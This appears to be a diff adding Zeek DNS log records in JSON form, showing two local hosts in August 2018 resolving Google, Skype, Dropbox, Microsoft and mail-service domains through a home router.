+{"ts":"2018-08-03T23:38:59.339961Z","uid":"C3qyLe2s5MEJo7Poea","id.orig_h":"192.168.0.54","id.orig_p":49300,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":20849,"query":"clients4.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153"],"TTLs":[213.0,213.0,213.0,213.0,213.0,213.0,213.0,213.0,213.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.220194Z","uid":"CC0u793YgazRXgmIC7","id.orig_h":"192.168.0.54","id.orig_p":52408,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":44634,"query":"ajax.aspnetcdn.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["mscomajax.vo.msecnd.net","cs1.wpc.v0cdn.net","68.232.34.200"],"TTLs":[1810.0,1786.0,476.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.984480Z","uid":"CtK8pe3RDiatUSIf8b","id.orig_h":"192.168.0.54","id.orig_p":58130,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":44781,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.936287Z","uid":"CkU65M1tAKw9sKcq01","id.orig_h":"192.168.0.51","id.orig_p":36033,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":58563,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.958959Z","uid":"CIf6K22es58vN1JH5g","id.orig_h":"192.168.0.54","id.orig_p":60303,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":45164,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.571932Z","uid":"C0rl3x2GZJjmBwiUtl","id.orig_h":"192.168.0.51","id.orig_p":11851,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55868,"query":"pop.gmx.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.597255Z","uid":"CpnFcC3vrsXmKRpcR5","id.orig_h":"192.168.0.54","id.orig_p":50538,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":49275,"query":"accounts.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.977630Z","uid":"ChaClL30Hn29aEh9mg","id.orig_h":"192.168.0.54","id.orig_p":54544,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":26958,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.241","173.194.40.242","173.194.40.243","173.194.40.244","173.194.40.240"],"TTLs":[241.0,241.0,241.0,241.0,241.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.943446Z","uid":"CEqfcRExDQRtK7ihi","id.orig_h":"192.168.0.54","id.orig_p":54920,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":45792,"query":"notify8.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["8.notify.dropbox.com","108.160.169.181","108.160.169.187","108.160.170.50","108.160.169.37","108.160.169.59","108.160.169.175"],"TTLs":[60.0,60.0,60.0,60.0,60.0,60.0,60.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.597080Z","uid":"CEqfcRExDQRtK7ihi","id.orig_h":"192.168.0.54","id.orig_p":54920,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13541,"query":"talkgadget.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["talkgadget.l.google.com","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152"],"TTLs":[78156.0,144.0,144.0,144.0,144.0,144.0,144.0,144.0,144.0],"rejected":false} +{"ts":"2018-08-03T23:39:01.159615Z","uid":"CdN96A2xg40vyPrEN7","id.orig_h":"192.168.0.54","id.orig_p":62577,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":29399,"query":"sync.mathtag.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["pixel-origin.mathtag.com","185.29.134.89","185.29.133.224"],"TTLs":[816.0,13.0,13.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.995862Z","uid":"CXBfWu2y2bJ0hSOyC6","id.orig_h":"192.168.0.54","id.orig_p":56412,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":11487,"query":"clients4.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.182","213.155.151.183","213.155.151.184","213.155.151.185","213.155.151.186","213.155.151.187","213.155.151.180","213.155.151.181"],"TTLs":[222.0,222.0,222.0,222.0,222.0,222.0,222.0,222.0,222.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.501990Z","uid":"CCI3if1Kf13DTlLFp","id.orig_h":"192.168.0.54","id.orig_p":60993,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":9231,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.430188Z","uid":"CpncE82syil4olINW9","id.orig_h":"192.168.0.51","id.orig_p":22686,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":1963,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.323852Z","uid":"CVlOYT27CMDJYGLmpg","id.orig_h":"192.168.0.54","id.orig_p":55002,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":17933,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.760387Z","uid":"CZCooG3lwwY1YWjfEj","id.orig_h":"192.168.0.54","id.orig_p":55801,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":23732,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.789623Z","uid":"Cm4aJd3AgISsiiFEgb","id.orig_h":"192.168.0.54","id.orig_p":59234,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16498,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.323852Z","uid":"C4HU7q1goo7aGR7al","id.orig_h":"192.168.0.54","id.orig_p":51238,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":43377,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.952711Z","uid":"C4HU7q1goo7aGR7al","id.orig_h":"192.168.0.54","id.orig_p":51238,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":14894,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.728485Z","uid":"CWLk9u3wldiNU7OC6","id.orig_h":"192.168.0.54","id.orig_p":58642,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40593,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.911752Z","uid":"CWLk9u3wldiNU7OC6","id.orig_h":"192.168.0.54","id.orig_p":58642,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38398,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.900418Z","uid":"C7QNWD1amcRetXYRxg","id.orig_h":"192.168.0.51","id.orig_p":38270,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":12609,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.513043Z","uid":"CxKknU3BcpvsjG0XI","id.orig_h":"192.168.0.51","id.orig_p":42365,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":31844,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.244286Z","uid":"CdPlEn3tYKRkOq8oV","id.orig_h":"192.168.0.51","id.orig_p":4085,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":12532,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.528493Z","uid":"CvF4U04JXtFBC1778k","id.orig_h":"192.168.0.54","id.orig_p":61121,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32588,"query":"clients4.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.180100Z","uid":"Cil43l1VLHpyXMiW51","id.orig_h":"192.168.0.54","id.orig_p":53713,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":17103,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.739786Z","uid":"CHhstC15rA3aKpR3Qg","id.orig_h":"192.168.0.54","id.orig_p":52387,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":43169,"query":"a.config.skype.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.581506Z","uid":"CHhzcB1WrFzar27e68","id.orig_h":"192.168.0.54","id.orig_p":56064,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":62799,"query":"talkgadget.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.055025Z","uid":"CHhzcB1WrFzar27e68","id.orig_h":"192.168.0.54","id.orig_p":56064,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":42549,"query":"lh4.googleusercontent.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlehosted.l.googleusercontent.com","216.58.209.97"],"TTLs":[75236.0,295.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.757815Z","uid":"C9iui53s1oj0WVYpV8","id.orig_h":"192.168.0.51","id.orig_p":60379,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32835,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.987467Z","uid":"C6I9v125h02eIqQeOl","id.orig_h":"192.168.0.54","id.orig_p":54708,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32938,"query":"clients6.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.491759Z","uid":"C6I9v125h02eIqQeOl","id.orig_h":"192.168.0.54","id.orig_p":54708,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":2481,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.242","173.194.40.243","173.194.40.244","173.194.40.240","173.194.40.241"],"TTLs":[299.0,299.0,299.0,299.0,299.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.489299Z","uid":"CcaO9i4dcDPpx7uJvl","id.orig_h":"192.168.0.51","id.orig_p":39618,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":60095,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.901974Z","uid":"CcaO9i4dcDPpx7uJvl","id.orig_h":"192.168.0.51","id.orig_p":39618,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32649,"query":"pop.gmx.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.188787Z","uid":"C0R4Uo4gMZYMpJDcn4","id.orig_h":"192.168.0.54","id.orig_p":55543,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":56086,"query":"chrome.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.787964Z","uid":"C0R4Uo4gMZYMpJDcn4","id.orig_h":"192.168.0.54","id.orig_p":55543,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":49651,"query":"mscrl.microsoft.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.787964Z","uid":"CBLswb8t2LJ9gX2Fd","id.orig_h":"192.168.0.51","id.orig_p":47515,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":19811,"query":"versioncheck-bg.addons.mozilla.org","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.162226Z","uid":"CtBO9n2iyCLLEuLMs8","id.orig_h":"192.168.0.54","id.orig_p":53176,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":53706,"query":"play.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.099358Z","uid":"CtBO9n2iyCLLEuLMs8","id.orig_h":"192.168.0.54","id.orig_p":53176,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":24473,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.162226Z","uid":"CCA8wA4c2JLvalgii","id.orig_h":"192.168.0.54","id.orig_p":53817,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13937,"query":"a.config.skype.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.config.skype.trafficmanager.net","skypeecs-prod-eun-0.cloudapp.net","137.116.224.167"],"TTLs":[970.0,7.0,9.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.269785Z","uid":"CCA8wA4c2JLvalgii","id.orig_h":"192.168.0.54","id.orig_p":53817,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":33979,"query":"193-149-88-183.drip.trouter.io","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["193.149.88.183"],"TTLs":[1197.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.628601Z","uid":"CszVf24ZxiuKCfCtJ","id.orig_h":"192.168.0.54","id.orig_p":64078,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":12083,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.963833Z","uid":"CzWbKP2Qiz7t3UwuD5","id.orig_h":"192.168.0.51","id.orig_p":24467,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":58376,"query":"pop.gmx.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.038432Z","uid":"C8S66I2QzvgXN11Kd5","id.orig_h":"192.168.0.54","id.orig_p":53700,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13431,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.073896Z","uid":"CatbBu1VH2alw9aisd","id.orig_h":"192.168.0.54","id.orig_p":64672,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":9818,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.241","173.194.40.242","173.194.40.243","173.194.40.244","173.194.40.240"],"TTLs":[241.0,241.0,241.0,241.0,241.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.358242Z","uid":"CXiiUV2DOokivVEBXg","id.orig_h":"192.168.0.54","id.orig_p":60001,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38879,"query":"chrome.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.825786Z","uid":"CSi8NzYexSa5I9jJ9","id.orig_h":"192.168.0.54","id.orig_p":61813,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":43949,"query":"clients6.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.184","213.155.151.185","213.155.151.186","213.155.151.187","213.155.151.180","213.155.151.181","213.155.151.182","213.155.151.183"],"TTLs":[68.0,212.0,212.0,212.0,212.0,212.0,212.0,212.0,212.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.231860Z","uid":"CSi8NzYexSa5I9jJ9","id.orig_h":"192.168.0.54","id.orig_p":61813,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":47094,"query":"clients6.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["clients.l.google.com","213.155.151.187","213.155.151.180","213.155.151.181","213.155.151.182","213.155.151.183","213.155.151.184","213.155.151.185","213.155.151.186"],"TTLs":[181.0,297.0,297.0,297.0,297.0,297.0,297.0,297.0,297.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.145877Z","uid":"Cw5QPgtM0G0drY9x8","id.orig_h":"192.168.0.54","id.orig_p":54423,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":4500,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.943341Z","uid":"CKkuFS2HC0w0PaICAb","id.orig_h":"192.168.0.54","id.orig_p":61656,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":11458,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.602996Z","uid":"CKkuFS2HC0w0PaICAb","id.orig_h":"192.168.0.54","id.orig_p":61656,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":9089,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[251.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.009184Z","uid":"CASzoy3QWV5Ho0r75f","id.orig_h":"192.168.0.54","id.orig_p":54540,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":20910,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152"],"TTLs":[236.0,236.0,236.0,236.0,236.0,236.0,236.0,236.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.241800Z","uid":"CBRkoR3lvXjBOp461k","id.orig_h":"192.168.0.51","id.orig_p":51338,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55936,"query":"safebrowsing-cache.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["safebrowsing.cache.l.google.com","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155"],"TTLs":[234998.0,23.0,23.0,23.0,23.0,23.0,23.0,23.0,23.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.223142Z","uid":"CtcD574CnGDstDLgpa","id.orig_h":"192.168.0.54","id.orig_p":52453,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":14716,"query":"apps.skype.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["wildcard.skype.com.edgekey.net","e4593.g.akamaiedge.net","23.223.29.38"],"TTLs":[2547.0,1628.0,0.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.527757Z","uid":"CkyLgA1TAzSNGrAdRf","id.orig_h":"192.168.0.54","id.orig_p":54131,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55790,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.050406Z","uid":"CkyLgA1TAzSNGrAdRf","id.orig_h":"192.168.0.54","id.orig_p":54131,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":62018,"query":"www.googleapis.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googleapis.l.google.com","216.58.209.106"],"TTLs":[1585.0,8.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.966439Z","uid":"Cb0oDz1hEwX3a8sPc","id.orig_h":"192.168.0.54","id.orig_p":50281,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":6559,"query":"safebrowsing.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["sb.l.google.com","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150"],"TTLs":[190312.0,24.0,24.0,24.0,24.0,24.0,24.0,24.0,24.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.040623Z","uid":"C72Fw51TI23aOl7kul","id.orig_h":"192.168.0.54","id.orig_p":51551,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":25153,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.501002Z","uid":"CKrbF23XH5P7U58UTl","id.orig_h":"192.168.0.54","id.orig_p":62536,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":8759,"query":"talkgadget.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["talkgadget.l.google.com","213.155.151.183","213.155.151.184","213.155.151.185","213.155.151.186","213.155.151.187","213.155.151.180","213.155.151.181","213.155.151.182"],"TTLs":[49081.0,19.0,19.0,19.0,19.0,19.0,19.0,19.0,19.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.905034Z","uid":"Cee4q23WQLcRqZlJ94","id.orig_h":"192.168.0.54","id.orig_p":57515,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16219,"query":"mail.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlemail.l.google.com","216.58.209.133"],"TTLs":[188873.0,222.0],"rejected":false} +{"ts":"2018-08-03T23:39:01.001664Z","uid":"CPvuV71dH9YBPqct99","id.orig_h":"192.168.0.54","id.orig_p":59539,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":44889,"query":"crl.microsoft.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.568556Z","uid":"CATSgW2JPVhX7ESua5","id.orig_h":"192.168.0.51","id.orig_p":39491,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":65240,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.938828Z","uid":"CpbMrRMBiJ0m58399","id.orig_h":"192.168.0.54","id.orig_p":58697,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":34555,"query":"www.microsoft.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["toggle.www.ms.akadns.net","www.microsoft.com-c.edgekey.net","www.microsoft.com-c.edgekey.net.globalredir.akadns.net","e10088.dspb.akamaiedge.net","23.78.127.162"],"TTLs":[2819.0,37.0,8207.0,2822.0,17.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.872704Z","uid":"Ch8Jur47mMF2voHQT5","id.orig_h":"192.168.0.54","id.orig_p":54375,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":27325,"query":"api.trap.skype.net","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.872704Z","uid":"CR1nf0433a3ialytj1","id.orig_h":"192.168.0.51","id.orig_p":64427,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":24377,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.083448Z","uid":"CR1nf0433a3ialytj1","id.orig_h":"192.168.0.51","id.orig_p":64427,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":51764,"query":"password-ned-xp","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.951848Z","uid":"CMMvTP2PNc0xC5kWvk","id.orig_h":"192.168.0.51","id.orig_p":48458,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":64493,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} 